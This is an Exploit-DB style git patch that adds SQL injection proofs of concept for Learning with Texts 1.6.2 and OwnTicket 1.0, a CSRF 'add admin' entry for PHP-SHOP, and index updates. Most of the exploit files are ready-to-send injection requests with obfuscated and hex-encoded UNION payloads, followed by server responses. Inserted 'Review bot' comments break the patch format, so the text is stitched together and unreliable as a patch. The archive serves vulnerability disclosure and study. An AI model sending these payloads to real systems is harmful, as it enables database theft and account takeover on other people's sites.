From fa0fe9b6cf95baf3bbbc404ad5e7327164a0d133 Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Fri, 19 Oct 2018 05:01:47 +0000 Subject: [PATCH] DB: 2018-10-19 3 changes to exploits/shellcodes MaxOn ERP Software 8.x-9.x - 'nomor' SQL Injection HaPe PKH 1.1 - 'id' SQL Injection LUYA CMS 1.0.12 - Cross-Site Scripting Phoenix Contact WebVisit 2985725 - Authentication Bypass HaPe PKH 1.1 - Cross-Site Request Forgery (Update Admin) CAMALEON CMS 2.4 - Cross-Site Scripting HaPe PKH 1.1 - Arbitrary File Upload SugarCRM 6.5.26 - Cross-Site Scripting HaPe PKH 1.1 - 'id' SQL Injection LUYA CMS 1.0.12 - Cross-Site Scripting Phoenix Contact WebVisit 2985725 - Authentication Bypass HaPe PKH 1.1 - Cross-Site Request Forgery (Update Admin) CAMALEON CMS 2.4 - Cross-Site Scripting HaPe PKH 1.1 - Arbitrary File Upload SugarCRM 6.5.26 - Cross-Site Scripting Academic Timetable Final Build 7.0a-7.0b - 'id' SQL Injection Academic Timetable Final Build 7.0b - Cross-Site Request Forgery (Add Admin) AlchemyCMS 4.1 - Cross-Site Scripting Academic Timetable Final Build 7.0b - Cross-Site Request Forgery (Add Admin) AlchemyCMS 4.1 - Cross-Site Scripting College Notes Management System 1.0 - 'user' SQL Injection Academic Timetable Final Build 7.0 - Information Disclosure KORA 2.7.0 - 'cid' SQL Injection HotelDruid 2.2.4 - 'anno' SQL Injection Navigate CMS 2.8.5 - Arbitrary File Download Library CMS 2.1.1 - Cross-Site Scripting Kados R10 GreenBee - 'release_id' SQL Injection Vishesh Auto Index 3.1 - 'fid' SQL Injection WordPress Plugin Support Board 1.2.3 - Cross-Site Scripting Rukovoditel Project Management CRM 2.3 - 'path' SQL Injection MV Video Sharing Software 1.2 - 'searchname' SQL Injection GIU Gallery Image Upload 0.3.1 - 'category' SQL Injection Academic Timetable Final Build 7.0 - Information Disclosure KORA 2.7.0 - 'cid' SQL Injection HotelDruid 2.2.4 - 'anno' SQL Injection Navigate CMS 2.8.5 - Arbitrary File Download Library CMS 2.1.1 - Cross-Site Scripting Kados R10 GreenBee - 'release_id' SQL Injection Vishesh Auto Index 3.1 - 'fid' SQL Injection 
WordPress Plugin Support Board 1.2.3 - Cross-Site Scripting Rukovoditel Project Management CRM 2.3 - 'path' SQL Injection MV Video Sharing Software 1.2 - 'searchname' SQL Injection GIU Gallery Image Upload 0.3.1 - 'category' SQL Injection BigTree CMS 4.2.23 - Cross-Site Scripting Learning with Texts 1.6.2 - 'start' SQL Injection PHP-SHOP master 1.0 - Cross-Site Request Forgery (Add admin) OwnTicket 1.0 - 'TicketID' SQL Injection --- exploits/php/webapps/45635.txt | 108 +++++++++++++++++++++++++++++++++ exploits/php/webapps/45636.txt | 32 ++++++++++ exploits/php/webapps/45637.txt | 58 ++++++++++++++++++ files_exploits.csv | 51 ++++++++-------- 4 files changed, 225 insertions(+), 24 deletions(-) create mode 100644 exploits/php/webapps/45635.txt create mode 100644 exploits/php/webapps/45636.txt create mode 100644 exploits/php/webapps/45637.txt diff --git a/exploits/php/webapps/45635.txt b/exploits/php/webapps/45635.txt new file mode 100644 index 000000000..fe488e6f0 --- /dev/null +++ b/exploits/php/webapps/45635.txt 
@@ -0,0 +1,108 @@ +# Exploit Title: Learning with Texts 1.6.2 - 'start' SQL Injection +# Dork: N/A +# Date: 2018-10-18 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://lwt.sourceforge.net/ +# Software Link: https://sourceforge.net/projects/lwt/files/latest/download +# Version: 1.6.2 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/do_text.php?start=[SQL] + +GET /[PATH]/do_text.php?start=1%20aND%20(SeLecT%2066%20FroM(SeLecT%20couNT(*),coNcaT(CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(SeLecT%20(eLT(66=66,1))),0x716b6b6a71,FLoor(raND(0)*2))x%20FroM%20INForMaTIoN_ScHeMa.PLuGINS%20GrouP%20BY%20x)a) HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +HTTP/1.1 200 OK +Date: Thu, 18 Oct 2018 00:15:33 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Set-Cookie: PHPSESSID=tqrrq29el6irt0blfl2vniiki4; path=/ +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Length: 1243 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +# POC: +# 2) +# http://localhost/[PATH]/delete_mword.php?wid=[SQL] + +GET /[PATH]/delete_mword.php?wid=%27%27%20And%20EXTraCTVALUE(22,CONcaT(0x5c,version(),(SEleCT%20(ELT(1=1,1))),database()))--%20Efe HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +HTTP/1.1 200 OK +Date: Thu, 18 Oct 2018 00:22:13 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: 
PHP/5.6.30 +Set-Cookie: PHPSESSID=3cmjrq63ttrcr53skm7jbrs4j1; path=/ +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Length: 868 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +# POC: +# 3) +# http://localhost/[PATH]/edit_words.php?new=1&lang=[SQL] + +GET /[PATH]/edit_words.php?new=1&lang=-11%20UnioN%20SElect%20NULL,NULL,CONCAT((SELECT+(@x)+FROM+(SELECT+(@x:=0x00),(@NR_DB:=0),(SELECT+(0)+FROM+(INFORMATION_SCHEMA.SCHEMATA)+WHERE+(@x)+IN+(@x:=CONCAT(@x,LPAD(@NR_DB:=@NR_DB%2b1,2,0x30),0x20203a2020,schema_name,0x3c62723e))))x))--++Efe HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=3cmjrq63ttrcr53skm7jbrs4j1 +Connection: keep-alive +HTTP/1.1 200 OK +Date: Thu, 18 Oct 2018 00:31:33 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Wed, 11 Jan 1984 05:00:00 GMT +Cache-Control: no-cache, must-revalidate, max-age=0 +Pragma: no-cache +Last-Modified: Thu, 18 Oct 2018 00:31:33 GMT +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Transfer-Encoding: chunked +Content-Type: text/html; charset=UTF-8 + +# POC: +# 4) +# http://localhost/[PATH]/display_impr_text_header.php?text=[SQL] + +GET /[PATH]/display_impr_text_header.php?text=-11%20UNION%20ALL%20SELECT%20%20666666,%20666666,666666,(SELECT+GROUP_CONCAT(schema_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.SCHEMATA)--+Efe HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=3cmjrq63ttrcr53skm7jbrs4j1 
+Connection: keep-alive +HTTP/1.1 200 OK +Date: Thu, 18 Oct 2018 00:44:43 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Wed, 11 Jan 1984 05:00:00 GMT +Cache-Control: no-cache, must-revalidate, max-age=0 +Pragma: no-cache +Last-Modified: Thu, 18 Oct 2018 00:44:43 GMT +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Transfer-Encoding: chunked +Content-Type: text/html; charset=UTF-8 \ No newline at end of file diff --git a/exploits/php/webapps/45636.txt b/exploits/php/webapps/45636.txt new file mode 100644 index 000000000..1b19dfcc6 --- /dev/null +++ b/exploits/php/webapps/45636.txt @@ -0,0 +1,32 @@ +# Exploit Title: PHP-SHOP master 1.0 - Cross-Site Request Forgery (Add admin) +# Exploit Author : Alireza Norkazemi +# Date: 2018-10-15 +# Vendor Homepage : https://github.com/joeyrush/PHP-SHOP +# Software link: https://github.com/joeyrush/PHP-SHOP/archive/master.zip +# Version: 1.0 +# Tested on: Windows 10 +# CVE: N/A + +# Proof of concept: +# Exploit: + + + + +POC + + +
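Review bot: The title line `# Exploit Title: Learning with Texts 1.6.2 - 'start' SQL Injection` names a single parameter, but the file documents four affected parameters in four scripts (`start` in do_text.php, `wid` in delete_mword.php, `lang` in edit_words.php, `text` in display_impr_text_header.php). Anyone triaging or patching from the title or the index row would cover only one of them. I would retitle it, e.g. `# Exploit Title: Learning with Texts 1.6.2 - Multiple SQL Injection`, and add a short `# Remediation:` comment saying that each listed parameter should be bound as a query parameter (or validated as an integer where it is an id) instead of being concatenated into the statement; the server-side code is not visible here, so that wording should stay general. The same mismatch applies to 45637.txt further down, whose title says 'TicketID' while the requests use `showTicketId` and `editTicketStatusId`.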
+ + + + + + +
+ + + \ No newline at end of file diff --git a/exploits/php/webapps/45637.txt b/exploits/php/webapps/45637.txt new file mode 100644 index 000000000..06d7cc781 --- /dev/null +++ b/exploits/php/webapps/45637.txt 
@@ -0,0 +1,58 @@ +# Exploit Title: OwnTicket 1.0 - 'TicketID' SQL Injection +# Dork: N/A +# Date: 2018-10-18 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: https://ownticket.sourceforge.io/ +# Software Link: https://sourceforge.net/projects/ownticket/files/latest/download +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/index.php?showTicketId=[SQL] + +GET /[PATH]/index.php?showTicketId=%2d%31%27%20%20%55%4e%49%4f%4e%28%53%45%4c%45%43%54%28%31%29%2c%28%32%29%2c%28%33%29%2c%28%34%29%2c%28%35%29%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%37%29%2c%28%38%29%2c%28%39%29%2c%28%31%30%29%2c%28%31%31%29%2c%28%31%32%29%2c%28%31%33%29%2c%28%31%34%29%29%2d%2d%20%2d HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=fhk729lg8ki4c9d1l24pbh8qn2 +Connection: keep-alive +HTTP/1.1 200 OK +Date: Thu, 18 Oct 2018 12:21:31 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Transfer-Encoding: chunked +Content-Type: text/html; charset=UTF-8 + +# POC: +# 2) +# http://localhost/[PATH]/index.php?editTicketStatusId=[SQL] + +GET /[PATH]/index.php?editTicketStatusId=%2d%31%27%20%20%55%4e%49%4f%4e%28%53%45%4c%45%43%54%28%31%29%2c%28%32%29%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%34%29%2c%28%35%29%2c%28%36%29%2c%28%37%29%2c%28%38%29%29%2d%2d%20%2d HTTP/1.1 +Host: 
TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=fcb8l8apgcokqmoeiahhpud9g2 +Connection: keep-alive +HTTP/1.1 200 OK +Date: Thu, 18 Oct 2018 12:24:12 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Transfer-Encoding: chunked +Content-Type: text/html; charset=UTF-8 \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index dbf4c5c06..2950df989 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
@@ -39520,7 +39520,7 @@ id,file,description,date,author,type,platform,port
 44164,exploits/php/webapps/44164.txt,"Joomla! Component Proclaim 9.1.1 - Arbitrary File Upload",2018-02-22,"Ihsan Sencan",webapps,php,
 44165,exploits/php/webapps/44165.txt,"Joomla! Component OS Property Real Estate 3.12.7 - SQL Injection",2018-02-22,"Ihsan Sencan",webapps,php,
 44166,exploits/jsp/webapps/44166.txt,"Trend Micro Email Encryption Gateway 5.5 (Build 1111.00) - Multiple Vulnerabilities",2018-02-22,"Core Security",webapps,jsp,
-45605,exploits/php/webapps/45605.txt,"MaxOn ERP Software 8.x-9.x - 'nomor' SQL Injection",2018-10-15,"Ihsan Sencan",webapps,php,
+45605,exploits/php/webapps/45605.txt,"MaxOn ERP Software 8.x-9.x - 'nomor' SQL Injection",2018-10-15,"Ihsan Sencan",webapps,php,80
 44186,exploits/php/webapps/44186.txt,"MyBB My Arcade Plugin 1.3 - Cross-Site Scripting",2018-02-27,0xB9,webapps,php,
 44276,exploits/multiple/webapps/44276.txt,"Prisma Industriale Checkweigher PrismaWEB 1.21 - Hard-Coded Credentials",2018-03-12,LiquidWorm,webapps,multiple,
 44191,exploits/php/webapps/44191.txt,"School Management Script 3.0.4 - Authentication Bypass",2018-02-27,"Samiran Santra",webapps,php,
@@ -40117,36 +40117,39 @@ id,file,description,date,author,type,platform,port
 45582,exploits/php/webapps/45582.txt,"E-Registrasi Pencak Silat 18.10 - 'id_partai' SQL Injection",2018-10-11,"Ihsan Sencan",webapps,php,
 45584,exploits/php/webapps/45584.txt,"jQuery-File-Upload 9.22.0 - Arbitrary File Upload",2018-10-11,"Larry W. Cashdollar",webapps,php,
 45586,exploits/hardware/webapps/45586.py,"Phoenix Contact WebVisit 6.40.00 - Password Disclosure",2018-10-11,Photubias,webapps,hardware,
-45588,exploits/php/webapps/45588.txt,"HaPe PKH 1.1 - 'id' SQL Injection",2018-10-12,"Ihsan Sencan",webapps,php,
-45589,exploits/php/webapps/45589.txt,"LUYA CMS 1.0.12 - Cross-Site Scripting",2018-10-12,"Ismail Tasdelen",webapps,php,
-45590,exploits/windows/webapps/45590.py,"Phoenix Contact WebVisit 2985725 - Authentication Bypass",2018-10-12,Photubias,webapps,windows,
-45591,exploits/php/webapps/45591.txt,"HaPe PKH 1.1 - Cross-Site Request Forgery (Update Admin)",2018-10-12,"Ihsan Sencan",webapps,php,
-45592,exploits/ruby/webapps/45592.txt,"CAMALEON CMS 2.4 - Cross-Site Scripting",2018-10-12,"Ismail Tasdelen",webapps,ruby,
-45593,exploits/php/webapps/45593.txt,"HaPe PKH 1.1 - Arbitrary File Upload",2018-10-12,"Ihsan Sencan",webapps,php,
-45594,exploits/php/webapps/45594.txt,"SugarCRM 6.5.26 - Cross-Site Scripting",2018-10-12,"Purplemet Security",webapps,php,
+45588,exploits/php/webapps/45588.txt,"HaPe PKH 1.1 - 'id' SQL Injection",2018-10-12,"Ihsan Sencan",webapps,php,80
+45589,exploits/php/webapps/45589.txt,"LUYA CMS 1.0.12 - Cross-Site Scripting",2018-10-12,"Ismail Tasdelen",webapps,php,80
+45590,exploits/windows/webapps/45590.py,"Phoenix Contact WebVisit 2985725 - Authentication Bypass",2018-10-12,Photubias,webapps,windows,80
+45591,exploits/php/webapps/45591.txt,"HaPe PKH 1.1 - Cross-Site Request Forgery (Update Admin)",2018-10-12,"Ihsan Sencan",webapps,php,80
+45592,exploits/ruby/webapps/45592.txt,"CAMALEON CMS 2.4 - Cross-Site Scripting",2018-10-12,"Ismail Tasdelen",webapps,ruby,80
+45593,exploits/php/webapps/45593.txt,"HaPe PKH 1.1 - Arbitrary File Upload",2018-10-12,"Ihsan Sencan",webapps,php,80
+45594,exploits/php/webapps/45594.txt,"SugarCRM 6.5.26 - Cross-Site Scripting",2018-10-12,"Purplemet Security",webapps,php,80
 45595,exploits/multiple/webapps/45595.py,"FluxBB < 1.5.6 - SQL Injection",2014-11-21,secthrowaway,webapps,multiple,
-45596,exploits/php/webapps/45596.txt,"Academic Timetable Final Build 7.0a-7.0b - 'id' SQL Injection",2018-10-15,"Ihsan Sencan",webapps,php,
+45596,exploits/php/webapps/45596.txt,"Academic Timetable Final Build 7.0a-7.0b - 'id' SQL Injection",2018-10-15,"Ihsan Sencan",webapps,php,80
 45597,exploits/hardware/webapps/45597.txt,"FLIR AX8 Thermal Camera 1.32.16 - Arbitrary File Disclosure",2018-10-15,LiquidWorm,webapps,hardware,
 45599,exploits/hardware/webapps/45599.txt,"FLIR Brickstream 3D+ 2.1.742.1842 - Config File Disclosure",2018-10-15,LiquidWorm,webapps,hardware,
-45600,exploits/php/webapps/45600.txt,"Academic Timetable Final Build 7.0b - Cross-Site Request Forgery (Add Admin)",2018-10-15,"Ihsan Sencan",webapps,php,
-45601,exploits/ruby/webapps/45601.txt,"AlchemyCMS 4.1 - Cross-Site Scripting",2018-10-15,"Ismail Tasdelen",webapps,ruby,
+45600,exploits/php/webapps/45600.txt,"Academic Timetable Final Build 7.0b - Cross-Site Request Forgery (Add Admin)",2018-10-15,"Ihsan Sencan",webapps,php,80
+45601,exploits/ruby/webapps/45601.txt,"AlchemyCMS 4.1 - Cross-Site Scripting",2018-10-15,"Ismail Tasdelen",webapps,ruby,80
 45602,exploits/hardware/webapps/45602.py,"FLIR AX8 Thermal Camera 1.32.16 - Remote Code Execution",2018-10-15,LiquidWorm,webapps,hardware,
-45603,exploits/php/webapps/45603.txt,"College Notes Management System 1.0 - 'user' SQL Injection",2018-10-15,"Ihsan Sencan",webapps,php,
+45603,exploits/php/webapps/45603.txt,"College Notes Management System 1.0 - 'user' SQL Injection",2018-10-15,"Ihsan Sencan",webapps,php,80
 45604,exploits/php/webapps/45604.txt,"Advanced HRM 1.6 - Remote Code Execution",2018-10-15,"Renos Nikolaou",webapps,php,
 45610,exploits/php/webapps/45610.txt,"Centos Web Panel 0.9.8.480 - Multiple Vulnerabilities",2018-10-15,seccops,webapps,php,
-45612,exploits/php/webapps/45612.php,"Academic Timetable Final Build 7.0 - Information Disclosure",2018-10-15,"Ihsan Sencan",webapps,php,
-45613,exploits/php/webapps/45613.txt,"KORA 2.7.0 - 'cid' SQL Injection",2018-10-15,"Ihsan Sencan",webapps,php,
-45614,exploits/php/webapps/45614.txt,"HotelDruid 2.2.4 - 'anno' SQL Injection",2018-10-16,"Ihsan Sencan",webapps,php,
-45615,exploits/php/webapps/45615.txt,"Navigate CMS 2.8.5 - Arbitrary File Download",2018-10-16,"Ihsan Sencan",webapps,php,
-45616,exploits/php/webapps/45616.txt,"Library CMS 2.1.1 - Cross-Site Scripting",2018-10-16,"Ismail Tasdelen",webapps,php,
-45617,exploits/php/webapps/45617.txt,"Kados R10 GreenBee - 'release_id' SQL Injection",2018-10-16,"Ihsan Sencan",webapps,php,
-45618,exploits/php/webapps/45618.txt,"Vishesh Auto Index 3.1 - 'fid' SQL Injection",2018-10-16,"Ihsan Sencan",webapps,php,
-45619,exploits/php/webapps/45619.txt,"WordPress Plugin Support Board 1.2.3 - Cross-Site Scripting",2018-10-16,"Ismail Tasdelen",webapps,php,
-45620,exploits/php/webapps/45620.txt,"Rukovoditel Project Management CRM 2.3 - 'path' SQL Injection",2018-10-16,"Ihsan Sencan",webapps,php,
-45621,exploits/php/webapps/45621.txt,"MV Video Sharing Software 1.2 - 'searchname' SQL Injection",2018-10-16,"Ihsan Sencan",webapps,php,
-45622,exploits/php/webapps/45622.txt,"GIU Gallery Image Upload 0.3.1 - 'category' SQL Injection",2018-10-16,"Ihsan Sencan",webapps,php,
+45612,exploits/php/webapps/45612.php,"Academic Timetable Final Build 7.0 - Information Disclosure",2018-10-15,"Ihsan Sencan",webapps,php,80
+45613,exploits/php/webapps/45613.txt,"KORA 2.7.0 - 'cid' SQL Injection",2018-10-15,"Ihsan Sencan",webapps,php,80
+45614,exploits/php/webapps/45614.txt,"HotelDruid 2.2.4 - 'anno' SQL Injection",2018-10-16,"Ihsan Sencan",webapps,php,80
+45615,exploits/php/webapps/45615.txt,"Navigate CMS 2.8.5 - Arbitrary File Download",2018-10-16,"Ihsan Sencan",webapps,php,80
+45616,exploits/php/webapps/45616.txt,"Library CMS 2.1.1 - Cross-Site Scripting",2018-10-16,"Ismail Tasdelen",webapps,php,80
+45617,exploits/php/webapps/45617.txt,"Kados R10 GreenBee - 'release_id' SQL Injection",2018-10-16,"Ihsan Sencan",webapps,php,80
+45618,exploits/php/webapps/45618.txt,"Vishesh Auto Index 3.1 - 'fid' SQL Injection",2018-10-16,"Ihsan Sencan",webapps,php,80
+45619,exploits/php/webapps/45619.txt,"WordPress Plugin Support Board 1.2.3 - Cross-Site Scripting",2018-10-16,"Ismail Tasdelen",webapps,php,80
+45620,exploits/php/webapps/45620.txt,"Rukovoditel Project Management CRM 2.3 - 'path' SQL Injection",2018-10-16,"Ihsan Sencan",webapps,php,80
+45621,exploits/php/webapps/45621.txt,"MV Video Sharing Software 1.2 - 'searchname' SQL Injection",2018-10-16,"Ihsan Sencan",webapps,php,80
+45622,exploits/php/webapps/45622.txt,"GIU Gallery Image Upload 0.3.1 - 'category' SQL Injection",2018-10-16,"Ihsan Sencan",webapps,php,80
 45623,exploits/hardware/webapps/45623.sh,"Heatmiser Wifi Thermostat 1.7 - Credential Disclosure",2018-10-16,d0wnp0ur,webapps,hardware,
-45628,exploits/php/webapps/45628.txt,"BigTree CMS 4.2.23 - Cross-Site Scripting",2018-10-17,"Ismail Tasdelen",webapps,php,
+45628,exploits/php/webapps/45628.txt,"BigTree CMS 4.2.23 - Cross-Site Scripting",2018-10-17,"Ismail Tasdelen",webapps,php,80
 45630,exploits/php/webapps/45630.txt,"Time and Expense Management System 3.0 - Cross-Site Request Forgery (Add Admin)",2018-10-17,"Ihsan Sencan",webapps,php,
 45632,exploits/hardware/webapps/45632.txt,"TP-Link TL-SC3130 1.6.18 - RTSP Stream Disclosure",2018-10-17,LiquidWorm,webapps,hardware,
 45633,exploits/php/webapps/45633.txt,"Time and Expense Management System 3.0 - 'table' SQL Injection",2018-10-17,"Ihsan Sencan",webapps,php,
+45635,exploits/php/webapps/45635.txt,"Learning with Texts 1.6.2 - 'start' SQL Injection",2018-10-18,"Ihsan Sencan",webapps,php,
+45636,exploits/php/webapps/45636.txt,"PHP-SHOP master 1.0 - Cross-Site Request Forgery (Add admin)",2018-10-18,"Alireza Norkazemi",webapps,php,80
+45637,exploits/php/webapps/45637.txt,"OwnTicket 1.0 - 'TicketID' SQL Injection",2018-10-18,"Ihsan Sencan",webapps,php,
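Review bot: The three rows added at the end of this hunk are inconsistent with the port backfill the same commit performs: 45636 is added with `80`, while 45635 and 45637 are added with an empty port even though their files show plain HTTP requests like the rows being corrected above. If the column is meant to be filled for web entries, both rows should end `...,webapps,php,80`; otherwise consumers filtering the index by port will miss them. The 45636 row also carries `2018-10-18` while the header in 45636.txt says `# Date: 2018-10-15`; that is fine if the column holds the publication date, but it is worth confirming. The 45635 description repeats the single-parameter title although the file covers four parameters, so a search of the index by affected parameter will not find the other three.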